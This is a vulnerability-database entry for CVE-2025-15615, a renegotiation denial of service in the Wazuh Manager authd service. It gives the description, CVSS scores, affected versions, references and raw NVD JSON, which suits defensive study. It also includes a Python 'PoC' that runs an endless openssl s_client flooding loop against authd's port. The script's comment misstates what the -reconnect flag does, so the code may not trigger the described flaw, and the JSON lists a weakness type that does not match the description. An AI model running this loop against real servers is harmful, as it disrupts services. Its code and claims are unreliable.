CVE-2025-15615

Description

Wazuh Manager authd service in wazuh-manager packages through version 4.7.3 contains an improper restriction of client-initiated SSL/TLS renegotiation vulnerability that allows remote attackers to cause a denial of service by sending excessive renegotiation requests. Attackers can exploit the lack of renegotiation limits to consume CPU resources and render the authd service unavailable.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE

Wazuh Manager <= 4.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import subprocess
import time

# Target configuration
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 1515

print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT} via SSL Renegotiation...")

try:
    while True:
        # Using openssl s_client to trigger renegotiation
        # -reconnect: Perform SSL renegotiation 50 times
        cmd = f"openssl s_client -connect {TARGET_HOST}:{TARGET_PORT} -reconnect"
        
        # Execute command and suppress output
        subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
        print("[+] Sent renegotiation batch...")
        
except KeyboardInterrupt:
    print("\n[!] Attack stopped by user.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15615
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15615
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15615/
[4] VulDB https://vuldb.com/cve/CVE-2025-15615
[5] https://github.com/wazuh/wazuh/security/advisories/GHSA-rr83-v9v7-jjhp
[6] https://www.vulncheck.com/advisories/ssl-tls-renegotiation-dos-in-wazuh-manager-authd-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15615", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:26.767", "lastModified": "2026-03-31T18:26:05.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh Manager authd service in wazuh-manager packages through version 4.7.3 contains an improper restriction of client-initiated SSL/TLS renegotiation vulnerability that allows remote attackers to cause a denial of service by sending excessive renegotiation requests. Attackers can exploit the lack of renegotiation limits to consume CPU resources and render the authd service unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.0", "matchCriteriaId": "7EA778B4-CBE5-4D8A-A08C-358D7F333B98"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-rr83-v9v7-jjhp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/ssl-tls-renegotiation-dos-in-wazuh-manager-authd-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}